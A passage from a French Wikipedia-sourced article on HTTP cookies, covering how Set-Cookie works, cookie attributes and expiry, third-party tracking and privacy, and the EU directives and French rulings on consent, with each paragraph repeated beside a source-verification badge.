Les cookies peuvent être limités dans leur portée à un domaine spécifique, un sous-domaine ou un chemin d'accès sur le serveur qui les a créés. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies peuvent être limités dans leur portée à un domaine spécifique, un sous-domaine ou un chemin d'accès sur le serveur qui les a créés.
×
Création d'un cookie
Le transfert des pages web se fait à l'aide du protocole de transfert hypertexte (HTTP). En ne tenant pas compte des cookies, les navigateurs appellent une page provenant des serveurs web en leur envoyant en général un texte court appelé requête HTTP[21]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Le transfert des pages web se fait à l'aide du protocole de transfert hypertexte (HTTP). En ne tenant pas compte des cookies, les navigateurs appellent une page provenant des serveurs web en leur envoyant en général un texte court appelé requête HTTP.
×
Par exemple, pour accéder à la page www.example.org/index.html, les navigateurs se connectent au serveur www.example.org et envoient une requête qui ressemble à celle-ci : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Par exemple, pour accéder à la page www.example.org/index.html, les navigateurs se connectent au serveur www.example.org et envoient une requête qui ressemble à celle-ci :
×
| GET /index.html HTTP/1.1 Host: www.example.org | SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06| GET /index.html HTTP/1.1 Host: www.example.org |× | |
| navigateur | → | serveur SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06navigateur | → | serveur× |
Le serveur répond en envoyant la page demandée, précédée par un texte similaire, le tout étant appelé réponse HTTP. Ce paquet peut contenir des lignes demandant au navigateur de stocker des cookies : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Le serveur répond en envoyant la page demandée, précédée par un texte similaire, le tout étant appelé réponse HTTP. Ce paquet peut contenir des lignes demandant au navigateur de stocker des cookies :
×
| HTTP/1.1 200 OK Content-type: text/html Set-Cookie: nom=valeur (page HTML) | SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06| HTTP/1.1 200 OK Content-type: text/html Set-Cookie: nom=valeur (page HTML) |× | |
| navigateur | ← | serveur SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06navigateur | ← | serveur× |
Le serveur envoie seulement la ligne Set-Cookie, si le serveur veut que le navigateur stocke un cookie. Set-Cookie est une requête pour que le navigateur stocke la chaîne nom=valeur et la renvoie dans toutes les futures requêtes au serveur. Si le navigateur supporte les cookies et que les cookies sont permis dans les options du navigateur, le cookie sera inclus dans toutes les requêtes suivantes faite au même serveur. Par exemple, le navigateur appelle la page www.example.org/news.html en envoyant au serveur www.example.org la requête suivante : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Le serveur envoie seulement la ligne Set-Cookie, si le serveur veut que le navigateur stocke un cookie. Set-Cookie est une requête pour que le navigateur stocke la chaîne nom=valeur et la renvoie dans toutes les futures requêtes au serveur. Si le navigateur supporte les cookies et que les cookies sont permis dans les options du navigateur, le cookie sera inclus dans toutes les requêtes suivantes faite au même serveur. Par exemple, le navigateur appelle la page www.example.org/news.html en envoyant au serveur www.example.org la requête suivante :
×
| GET /news.html HTTP/1.1 Host: www.example.org Cookie: nom=valeur Accept: */* | SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06| GET /news.html HTTP/1.1 Host: www.example.org Cookie: nom=valeur Accept: */* |× | |
| navigateur | → | serveur SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06navigateur | → | serveur× |
Ceci est une requête pour une autre page du même serveur, et diffère de la première au-dessus car elle contient une chaîne que le serveur a précédemment envoyée au navigateur. Grâce à ce moyen, le serveur sait que cette requête est reliée à la précédente. Le serveur répond en envoyant la page appelée, ainsi qu'en y ajoutant d'autres cookies. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Ceci est une requête pour une autre page du même serveur, et diffère de la première au-dessus car elle contient une chaîne que le serveur a précédemment envoyée au navigateur. Grâce à ce moyen, le serveur sait que cette requête est reliée à la précédente. Le serveur répond en envoyant la page appelée, ainsi qu'en y ajoutant d'autres cookies.
×
La valeur du cookie peut être modifiée par le serveur en envoyant une nouvelle ligne Set-Cookie: nom=nouvelle_valeur en réponse à la page appelée. Le navigateur remplace alors l'ancienne valeur par la nouvelle. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06La valeur du cookie peut être modifiée par le serveur en envoyant une nouvelle ligne Set-Cookie: nom=nouvelle_valeur en réponse à la page appelée. Le navigateur remplace alors l'ancienne valeur par la nouvelle.
×
La ligne Set-Cookie est généralement créée par un programme CGI ou un autre langage de script, et non par le serveur HTTP. Le serveur HTTP (exemple : Apache) ne fera que transmettre le résultat du programme (un document précédé par l'en-tête contenant les cookies) au navigateur. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06La ligne Set-Cookie est généralement créée par un programme CGI ou un autre langage de script, et non par le serveur HTTP. Le serveur HTTP (exemple : Apache) ne fera que transmettre le résultat du programme (un document précédé par l'en-tête contenant les cookies) au navigateur.
×
Les cookies peuvent aussi être mis en place par JavaScript ou d'autres langages similaires exécutés dans le navigateur, c'est-à-dire du côté du client plutôt que du côté du serveur. En JavaScript, l'objet document.cookie est utilisé dans ce but. Par exemple, l'instruction document.cookie = "température=20" crée un cookie nommé « température » et de valeur 20. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies peuvent aussi être mis en place par JavaScript ou d'autres langages similaires exécutés dans le navigateur, c'est-à-dire du côté du client plutôt que du côté du serveur. En JavaScript, l'objet document.cookie est utilisé dans ce but. Par exemple, l'instruction document.cookie = "température=20" crée un cookie nommé « température » et de valeur 20.
×
Attributs d'un cookie

En plus de la paire nom/valeur, un cookie peut aussi contenir une date d'expiration, un chemin, un nom de domaine et le type de connexion prévu, c'est-à-dire en clair ou chiffrée. La RFC 2965[20] définit aussi que les cookies doivent avoir un numéro de version obligatoire, mais cela est généralement omis. Ces parties de données suivent la paire nom=nouvelle_valeur et sont séparées par des points-virgules. Par exemple, un cookie peut être créé par le serveur en envoyant une ligne Set-Cookie: nom=nouvelle_valeur; expires=date; path=/; domain=.exemple.org. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06En plus de la paire nom/valeur, un cookie peut aussi contenir une date d'expiration, un chemin, un nom de domaine et le type de connexion prévu, c'est-à-dire en clair ou chiffrée. La RFC 2965 définit aussi que les cookies doivent avoir un numéro de version obligatoire, mais cela est généralement omis. Ces parties de données suivent la paire nom=nouvelle_valeur et sont séparées par des points-virgules. Par exemple, un cookie peut être créé par le serveur en envoyant une ligne Set-Cookie: nom=nouvelle_valeur; expires=date; path=/; domain=.exemple.org.
×
Les secure cookies
Les secure cookies sont un type de cookies qui ont l'attribut Secure configuré, ce qui limite l'utilisation du cookie à des canaux dits « sécurisés » (où « sécurisé » est défini par l'agent utilisateur, typiquement le navigateur web)[22]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les secure cookies sont un type de cookies qui ont l'attribut Secure configuré, ce qui limite l'utilisation du cookie à des canaux dits « sécurisés » (où « sécurisé » est défini par l'agent utilisateur, typiquement le navigateur web).
×
Expiration d'un cookie
Les cookies expirent et ne sont alors pas envoyés par le navigateur au serveur dans les situations suivantes : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies expirent et ne sont alors pas envoyés par le navigateur au serveur dans les situations suivantes :
×
- lorsque le navigateur est fermé, si le cookie n'est pas persistant ; SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
lorsque le navigateur est fermé, si le cookie n'est pas persistant ;
× - lorsque la date d'expiration du cookie est dépassée ; SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
lorsque la date d'expiration du cookie est dépassée ;
× - lorsque la date d'expiration du cookie est modifiée (par le serveur ou le script) en une date du passé ; SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
lorsque la date d'expiration du cookie est modifiée (par le serveur ou le script) en une date du passé ;
× - lorsque le navigateur supprime le cookie à la demande de l'utilisateur. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
lorsque le navigateur supprime le cookie à la demande de l'utilisateur.
×
La troisième situation permet aux serveurs ou aux scripts de supprimer explicitement un cookie. Notons qu'il est possible avec le navigateur web Google Chrome de connaître la date d'expiration d'un cookie en particulier en accédant aux paramètres du contenu. Historiquement, aucune limite technique n'empêchait un cookie de rester indéfiniment sur un ordinateur, sa date d'expiration pouvant être fixée à plusieurs millénaires dans le futur[23]. Depuis 2022, un projet de mise à jour de la RFC 6265[24] limite cette durée à 400 jours maximum, une limite adoptée par Google Chrome mais pas encore par Mozilla Firefox ni Safari[25]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06La troisième situation permet aux serveurs ou aux scripts de supprimer explicitement un cookie. Notons qu'il est possible avec le navigateur web Google Chrome de connaître la date d'expiration d'un cookie en particulier en accédant aux paramètres du contenu. Historiquement, aucune limite technique n'empêchait un cookie de rester indéfiniment sur un ordinateur, sa date d'expiration pouvant être fixée à plusieurs millénaires dans le futur. Depuis 2022, un projet de mise à jour de la RFC 6265 limite cette durée à 400 jours maximum, une limite adoptée par Google Chrome mais pas encore par Mozilla Firefox ni Safari.
×
Idées reçues
Depuis leur introduction sur Internet, de nombreuses idées sur les cookies ont circulé sur Internet et dans les médias. En 1998, CIAC, une équipe de surveillance des incidents d'ordinateur du département de l'Énergie des États-Unis, a déterminé que les failles de sécurité des cookies étaient « essentiellement non existantes » et a expliqué que « l'information sur la provenance de vos visites et le détail des pages web que vous avez visitées existent déjà dans les fichiers de journalisation des serveurs web ». En 2005, Jupiter Research a publié les résultats d'une étude, dans laquelle un pourcentage important des personnes interrogées a considéré les affirmations suivantes : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Depuis leur introduction sur Internet, de nombreuses idées sur les cookies ont circulé sur Internet et dans les médias. En 1998, CIAC, une équipe de surveillance des incidents d'ordinateur du département de l'Énergie des États-Unis, a déterminé que les failles de sécurité des cookies étaient « essentiellement non existantes » et a expliqué que « l'information sur la provenance de vos visites et le détail des pages web que vous avez visitées existent déjà dans les fichiers de journalisation des serveurs web ». En 2005, Jupiter Research a publié les résultats d'une étude, dans laquelle un pourcentage important des personnes interrogées a considéré les affirmations suivantes :
×
- les cookies sont comme des virus, ils infectent les disques durs des utilisateurs ; SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
les cookies sont comme des virus, ils infectent les disques durs des utilisateurs ;
× - les cookies génèrent des pop-up ; SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
les cookies génèrent des pop-up ;
× - les cookies sont utilisés pour envoyer du spam ; SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
les cookies sont utilisés pour envoyer du spam ;
× - les cookies sont utilisés uniquement pour la publicité. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
les cookies sont utilisés uniquement pour la publicité.
×
Les cookies ne peuvent pas effacer ou lire l'information provenant de l'ordinateur de l'utilisateur. Cependant, les cookies permettent de détecter les pages web visitées par un utilisateur sur un site donné ou un ensemble de sites. Ces informations peuvent être collectées dans un profil d'utilisateur pouvant être utilisé ou revendu à des tierces parties, ce qui peut poser de sérieux problèmes de protection de la vie privée. Certains profils sont anonymes, en ce sens qu'ils ne contiennent pas d'information personnelle. Pourtant, même de tels profils peuvent être sujets à caution. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies ne peuvent pas effacer ou lire l'information provenant de l'ordinateur de l'utilisateur. Cependant, les cookies permettent de détecter les pages web visitées par un utilisateur sur un site donné ou un ensemble de sites. Ces informations peuvent être collectées dans un profil d'utilisateur pouvant être utilisé ou revendu à des tierces parties, ce qui peut poser de sérieux problèmes de protection de la vie privée. Certains profils sont anonymes, en ce sens qu'ils ne contiennent pas d'information personnelle. Pourtant, même de tels profils peuvent être sujets à caution.
×
Selon la même étude, un grand pourcentage d'utilisateurs d'Internet ignorent comment supprimer les cookies. L'une des raisons pour lesquelles les gens ne font pas confiance aux cookies est que certains sites ont abusé de l'aspect de l'identification personnelle des cookies et ont partagé ces informations avec d'autres sources. Un grand pourcentage de la publicité ciblée et de courriels non sollicités, considérés comme spam, provient de l'information glanée par les cookies de pistage. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Selon la même étude, un grand pourcentage d'utilisateurs d'Internet ignorent comment supprimer les cookies. L'une des raisons pour lesquelles les gens ne font pas confiance aux cookies est que certains sites ont abusé de l'aspect de l'identification personnelle des cookies et ont partagé ces informations avec d'autres sources. Un grand pourcentage de la publicité ciblée et de courriels non sollicités, considérés comme spam, provient de l'information glanée par les cookies de pistage.
×
En réalité, les cookies qui n'ont initialement pas été créés dans le but de réaliser des publicités commerciales ont donné le jour à toute une industrie publicitaire qui, selon le président de la commission digitale de l’Union des entreprises de conseil et d'achat média, « donne des informations sur les internautes, notamment leur intérêt pour tel ou tel produit, peut-être une intention d’achat »[26]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06En réalité, les cookies qui n'ont initialement pas été créés dans le but de réaliser des publicités commerciales ont donné le jour à toute une industrie publicitaire qui, selon le président de la commission digitale de l’Union des entreprises de conseil et d'achat média, « donne des informations sur les internautes, notamment leur intérêt pour tel ou tel produit, peut-être une intention d’achat ».
×
La suppression des cookies tiers prévue entre 2020 et 2022 est voulue pour limiter ces inconvénients. Cependant, elle pourrait profiter aux GAFAM au détriment des autres publicitaires, les GAFAM qui, détenant déjà les trois quarts du marché français, sortiraient renforcées de meilleures technologies d’annonce ciblée[26]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06La suppression des cookies tiers prévue entre 2020 et 2022 est voulue pour limiter ces inconvénients. Cependant, elle pourrait profiter aux GAFAM au détriment des autres publicitaires, les GAFAM qui, détenant déjà les trois quarts du marché français, sortiraient renforcées de meilleures technologies d’annonce ciblée.
×
Vie privée et cookies tierce partie

Les cookies ont des implications importantes dans la vie privée et l'anonymat des utilisateurs du web. Bien que les cookies soient seulement renvoyés au serveur les ayant mis en place ou à un serveur appartenant au même domaine Internet, une page web peut cependant contenir des images ou d'autres composants stockés sur des serveurs appartenant à d'autres domaines. Les cookies qui sont mis en place durant la récupération de ces composants externes sont appelés cookies tiers. Cela inclut les cookies provenant des fenêtres pop-up indésirables. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies ont des implications importantes dans la vie privée et l'anonymat des utilisateurs du web. Bien que les cookies soient seulement renvoyés au serveur les ayant mis en place ou à un serveur appartenant au même domaine Internet, une page web peut cependant contenir des images ou d'autres composants stockés sur des serveurs appartenant à d'autres domaines. Les cookies qui sont mis en place durant la récupération de ces composants externes sont appelés cookies tiers. Cela inclut les cookies provenant des fenêtres pop-up indésirables.
×
Les entreprises de publicité utilisent les cookies tiers pour pister les utilisateurs à travers les différents sites qu'ils visitent. En particulier, une entreprise de publicité peut pister un utilisateur à travers toutes les pages sur lesquels elle a placé des images de publicité ou un pixel espion. La connaissance des pages visitées par l'utilisateur permet à l'entreprise de publicité de cibler les préférences publicitaires de l'utilisateur. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les entreprises de publicité utilisent les cookies tiers pour pister les utilisateurs à travers les différents sites qu'ils visitent. En particulier, une entreprise de publicité peut pister un utilisateur à travers toutes les pages sur lesquels elle a placé des images de publicité ou un pixel espion. La connaissance des pages visitées par l'utilisateur permet à l'entreprise de publicité de cibler les préférences publicitaires de l'utilisateur.
×
La possibilité de construire un profil d'utilisateur est considérée par certains comme une intrusion dans la vie privée, particulièrement quand le pistage est fait à travers différents domaines utilisant les cookies tiers. Pour cette raison, certains pays ont une législation sur les cookies. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06La possibilité de construire un profil d'utilisateur est considérée par certains comme une intrusion dans la vie privée, particulièrement quand le pistage est fait à travers différents domaines utilisant les cookies tiers. Pour cette raison, certains pays ont une législation sur les cookies.
×
Le gouvernement des États-Unis a mis en place des règles strictes sur la mise en place des cookies en 2000, après qu'il fut révélé que le bureau des politiques antidrogues de la Maison Blanche utilisait les cookies pour suivre les ordinateurs des utilisateurs regardant en ligne les publicités antidrogues. En 2002, l'activiste de la vie privée Daniel Brandt a découvert que la CIA laissait des cookies persistants sur les ordinateurs qui avaient visité ses sites web. Une fois informée de cette violation, la CIA déclara que ces cookies n'étaient pas intentionnellement envoyés et cessa de les mettre en place. Le 25 décembre 2005, Brandt a découvert que la National Security Agency (NSA) avait laissé deux cookies persistants sur des ordinateurs de visiteurs à cause d'une mise à jour logicielle. Après avoir été informée, la NSA désactiva immédiatement les cookies. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Le gouvernement des États-Unis a mis en place des règles strictes sur la mise en place des cookies en 2000, après qu'il fut révélé que le bureau des politiques antidrogues de la Maison Blanche utilisait les cookies pour suivre les ordinateurs des utilisateurs regardant en ligne les publicités antidrogues. En 2002, l'activiste de la vie privée Daniel Brandt a découvert que la CIA laissait des cookies persistants sur les ordinateurs qui avaient visité ses sites web. Une fois informée de cette violation, la CIA déclara que ces cookies n'étaient pas intentionnellement envoyés et cessa de les mettre en place. Le 25 décembre 2005, Brandt a découvert que la National Security Agency (NSA) avait laissé deux cookies persistants sur des ordinateurs de visiteurs à cause d'une mise à jour logicielle. Après avoir été informée, la NSA désactiva immédiatement les cookies.
×
Au Royaume-Uni, la « Cookie law », entrée en vigueur le 25 mai 2012, oblige les sites à déclarer leurs intentions, permettant ainsi aux utilisateurs de choisir s'ils veulent laisser des traces ou pas de leur passage sur internet. Ils peuvent ainsi être à l'abri du ciblage publicitaire. Cependant, d'après The Guardian[27], le consentement des internautes n'est pas obligatoirement explicite ; des modifications ont été apportées aux modalités de consentement de l'usager, le rendant ainsi implicite[28]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Au Royaume-Uni, la « Cookie law », entrée en vigueur le 25 mai 2012, oblige les sites à déclarer leurs intentions, permettant ainsi aux utilisateurs de choisir s'ils veulent laisser des traces ou pas de leur passage sur internet. Ils peuvent ainsi être à l'abri du ciblage publicitaire. Cependant, d'après The Guardian, le consentement des internautes n'est pas obligatoirement explicite ; des modifications ont été apportées aux modalités de consentement de l'usager, le rendant ainsi implicite.
×
Cadre légal
Directive 2002/58 sur la vie privée
La directive 2002/58 vie privée et communications électroniques, contient des règles sur l'utilisation des cookies. En particulier, l'article 5, paragraphe 3 de cette directive exige que le stockage des données (comme les cookies) dans l'ordinateur de l'utilisateur puisse seulement être fait si : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06La directive 2002/58 vie privée et communications électroniques, contient des règles sur l'utilisation des cookies. En particulier, l'article 5, paragraphe 3 de cette directive exige que le stockage des données (comme les cookies) dans l'ordinateur de l'utilisateur puisse seulement être fait si :
×
- l'utilisateur est informé de la façon dont les données sont utilisées ; SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
l'utilisateur est informé de la façon dont les données sont utilisées ;
× - il est donné à l'utilisateur la possibilité de refuser cette opération de stockage. Cependant, cet article statue aussi que le stockage de données pour raisons techniques est exempté de cette loi. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
il est donné à l'utilisateur la possibilité de refuser cette opération de stockage. Cependant, cet article statue aussi que le stockage de données pour raisons techniques est exempté de cette loi.
×
Devant être mise en application à partir d'octobre 2003, la directive n'a cependant été que très imparfaitement mise en pratique selon un rapport de décembre 2004, qui signalait en outre que certains États-membres (Slovaquie, Lettonie, Grèce, Belgique et Luxembourg) n'avaient pas encore transposé la directive en droit interne. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Devant être mise en application à partir d'octobre 2003, la directive n'a cependant été que très imparfaitement mise en pratique selon un rapport de décembre 2004, qui signalait en outre que certains États-membres (Slovaquie, Lettonie, Grèce, Belgique et Luxembourg) n'avaient pas encore transposé la directive en droit interne.
×
Selon l'avis du G29 de 2010[29], cette directive qui conditionne notamment l'usage des cookies à des fins de publicité comportementale au consentement explicite de l'internaute demeure très mal appliquée. En fait la plupart des sites le font de façon non conforme à la directive, en se limitant à une simple « bannière » informant de l'utilisation de « cookies » sans donner d'information sur les utilisations, sans différencier les cookies « techniques » des cookies de « pistage », ni d'offrir de choix réel à l’utilisateur désirant maintenir les cookies techniques (comme les cookies de gestion du panier d'achat) et refuser les cookies de « pistage ». De fait, de nombreux sites ne fonctionnent pas correctement si les cookies sont refusés, ce qui n'est ni conforme à la directive 2002/58 ni à la directive 95/46 (Protection des données personnelles). SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Selon l'avis du G29 de 2010, cette directive qui conditionne notamment l'usage des cookies à des fins de publicité comportementale au consentement explicite de l'internaute demeure très mal appliquée. En fait la plupart des sites le font de façon non conforme à la directive, en se limitant à une simple « bannière » informant de l'utilisation de « cookies » sans donner d'information sur les utilisations, sans différencier les cookies « techniques » des cookies de « pistage », ni d'offrir de choix réel à l’utilisateur désirant maintenir les cookies techniques (comme les cookies de gestion du panier d'achat) et refuser les cookies de « pistage ». De fait, de nombreux sites ne fonctionnent pas correctement si les cookies sont refusés, ce qui n'est ni conforme à la directive 2002/58 ni à la directive 95/46 (Protection des données personnelles).
×
Directive 2009/136/CE
Cette matière a été actualisée par la directive 2009/136/CE datée du 25 novembre 2009, qui indique que « Le stockage d'informations, ou l'obtention de l'accès à des informations déjà stockées, dans l'équipement terminal d'un abonné ou d'un utilisateur n'est permis qu'à condition que l'abonné ou l'utilisateur ait donné son accord, après avoir reçu, dans le respect de la directive 95/46/CE, une information claire et complète, entre autres sur les finalités du traitement. » La nouvelle directive renforce donc les obligations préalables au placement de cookies sur l'ordinateur de l'internaute. Elle modifie la directive 2002/22/CE. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Cette matière a été actualisée par la directive 2009/136/CE datée du 25 novembre 2009, qui indique que « Le stockage d'informations, ou l'obtention de l'accès à des informations déjà stockées, dans l'équipement terminal d'un abonné ou d'un utilisateur n'est permis qu'à condition que l'abonné ou l'utilisateur ait donné son accord, après avoir reçu, dans le respect de la directive 95/46/CE, une information claire et complète, entre autres sur les finalités du traitement. » La nouvelle directive renforce donc les obligations préalables au placement de cookies sur l'ordinateur de l'internaute. Elle modifie la directive 2002/22/CE.
×
Dans les considérations préalables de la directive, le législateur européen précise toutefois : « Lorsque cela est techniquement possible et effectif, conformément aux dispositions pertinentes de la directive 95/46/CE, l'accord de l'utilisateur en ce qui concerne le traitement peut être exprimé par l'utilisation des paramètres appropriés d'un navigateur ou d'une autre application. » Dans les faits, aucun navigateur à ce jour ne permet de dissocier les cookies techniques indispensables de ceux optionnels qui devraient être laissés au choix de l'utilisateur.[réf. nécessaire] SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Dans les considérations préalables de la directive, le législateur européen précise toutefois : « Lorsque cela est techniquement possible et effectif, conformément aux dispositions pertinentes de la directive 95/46/CE, l'accord de l'utilisateur en ce qui concerne le traitement peut être exprimé par l'utilisation des paramètres appropriés d'un navigateur ou d'une autre application. » Dans les faits, aucun navigateur à ce jour ne permet de dissocier les cookies techniques indispensables de ceux optionnels qui devraient être laissés au choix de l'utilisateur.[réf. nécessaire]
×
Cette nouvelle directive a été transposée par les députés belges en juillet 2012. Une étude de 2014 montre que même les députés peinent à appliquer les contraintes de la directive[30]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Cette nouvelle directive a été transposée par les députés belges en juillet 2012. Une étude de 2014 montre que même les députés peinent à appliquer les contraintes de la directive.
×
La directive 2002/58/CE concerne le traitement des données à caractère personnel et la protection de la vie privée dans le secteur des communications électroniques et le règlement (CE) n° 2006/2004 est relatif à la coopération entre les autorités nationales chargées de veiller à l’application de la législation en matière de protection des consommateurs. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06La directive 2002/58/CE concerne le traitement des données à caractère personnel et la protection de la vie privée dans le secteur des communications électroniques et le règlement (CE) n° 2006/2004 est relatif à la coopération entre les autorités nationales chargées de veiller à l’application de la législation en matière de protection des consommateurs.
×
Limites de la CNIL
En France, le Conseil d'État considère que la CNIL ne peut « légalement interdire (…) les « cookies walls », pratique qui consiste à bloquer l’accès à un site Internet en cas de refus des cookies » : « En déduisant une telle interdiction de la seule exigence d’un consentement libre de l’utilisateur au dépôt de traceurs posé par le règlement européen sur la protection des données RGPD, la CNIL a excédé ce qu’elle pouvait légalement faire »[31]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06En France, le Conseil d'État considère que la CNIL ne peut « légalement interdire (…) les « cookies walls », pratique qui consiste à bloquer l’accès à un site Internet en cas de refus des cookies » : « En déduisant une telle interdiction de la seule exigence d’un consentement libre de l’utilisateur au dépôt de traceurs posé par le règlement européen sur la protection des données RGPD, la CNIL a excédé ce qu’elle pouvait légalement faire ».
×
Cadre technique
P3P
